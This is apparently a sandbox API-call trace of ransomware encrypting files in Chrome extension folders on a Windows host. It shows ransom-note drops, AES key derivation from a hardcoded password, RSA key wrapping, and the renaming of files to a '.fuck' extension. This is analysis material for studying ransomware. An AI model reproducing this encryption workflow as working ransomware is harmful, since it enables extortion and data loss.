AreFileApisANSI () returned 1 [0248.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.237] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.237] GetFileType (hFile=0x5d50) returned 0x1 [0248.238] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.239] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.239] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2938af8 [0248.240] FindNextFileA (in: hFindFile=0x2938af8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.240] FindNextFileA (in: hFindFile=0x2938af8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.240] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.240] GetLastError () returned 0x0 [0248.240] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json")) returned 0x20 [0248.240] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json", dwFileAttributes=0x80) returned 1 [0248.241] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.241] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.242] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.242] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.245] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.245] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.245] CryptHashData (hHash=0x29387f8, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.245] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x29387f8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29389f8) returned 1 [0248.245] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.245] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.245] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293b698) returned 1 [0248.246] CryptImportPublicKeyInfo (in: hCryptProv=0x293b698, dwCertEncodingType=0x1, pInfo=0x292f390*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292f3c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292f3c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2936eb8) returned 1 [0248.246] CryptEncrypt (in: hKey=0x2936eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.246] CryptEncrypt (in: hKey=0x2936eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293b940*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293b940*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.246] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293b940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293b940*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.247] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe4, lpOverlapped=0x0) returned 1 [0248.248] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe4, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0248.248] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0248.248] CloseHandle (hObject=0x5d58) returned 1 [0248.248] CloseHandle (hObject=0x5d5c) returned 1 [0248.249] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json"), bFailIfExists=0) returned 1 [0248.252] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json", dwFileAttributes=0x0) returned 1 [0248.253] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.gsg")) returned 1 [0248.254] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.fuck")) returned 1 [0248.258] CryptDestroyHash (hHash=0x29387f8) returned 1 [0248.258] CryptDestroyKey (hKey=0x29389f8) returned 1 [0248.258] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.258] FindNextFileA (in: hFindFile=0x2938af8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.258] FindClose (in: hFindFile=0x2938af8 | out: hFindFile=0x2938af8) returned 1 [0248.258] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\readme_back_files.htm")) returned 0xffffffff [0248.258] AreFileApisANSI () returned 1 [0248.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3a48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.258] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.259] GetFileType (hFile=0x5d50) returned 0x1 [0248.259] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.260] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.260] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2938978 [0248.261] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.261] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.261] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.261] GetLastError () returned 0x0 [0248.261] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json")) returned 0x20 [0248.261] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json", dwFileAttributes=0x80) returned 1 [0248.262] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.262] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.263] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.264] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.266] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.266] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.266] CryptHashData (hHash=0x29389f8, pbData=0x28cb558, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.266] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x29389f8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29387f8) returned 1 [0248.266] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.266] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.266] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293b0c0) returned 1 [0248.267] CryptImportPublicKeyInfo (in: hCryptProv=0x293b0c0, dwCertEncodingType=0x1, pInfo=0x2930230*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2930260*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2930268*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2936db8) returned 1 [0248.267] CryptEncrypt (in: hKey=0x2936db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.267] CryptEncrypt (in: hKey=0x2936db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293b9c8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293b9c8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.267] WriteFile (in: hFile=0x5d58, lpBuffer=0x293b9c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293b9c8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.268] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe9, lpOverlapped=0x0) returned 1 [0248.269] CryptEncrypt (in: hKey=0x29387f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe9, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0248.269] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0248.270] CloseHandle (hObject=0x5d5c) returned 1 [0248.270] CloseHandle (hObject=0x5d58) returned 1 [0248.273] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json"), bFailIfExists=0) returned 1 [0248.277] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json", dwFileAttributes=0x0) returned 1 [0248.277] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.gsg")) returned 1 [0248.279] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.fuck")) returned 1 [0248.280] CryptDestroyHash (hHash=0x29389f8) returned 1 [0248.280] CryptDestroyKey (hKey=0x29387f8) returned 1 [0248.280] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.280] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.280] FindClose (in: hFindFile=0x2938978 | out: hFindFile=0x2938978) returned 1 [0248.280] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\readme_back_files.htm")) returned 0xffffffff [0248.280] AreFileApisANSI () returned 1 [0248.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.280] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.280] GetFileType (hFile=0x5d50) returned 0x1 [0248.281] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.281] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.281] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0248.282] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.282] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.282] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.282] GetLastError () returned 0x0 [0248.282] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json")) returned 0x20 [0248.283] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json", dwFileAttributes=0x80) returned 1 [0248.283] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.283] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.284] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.gsg", dwFileAttributes=0x2) returned 1 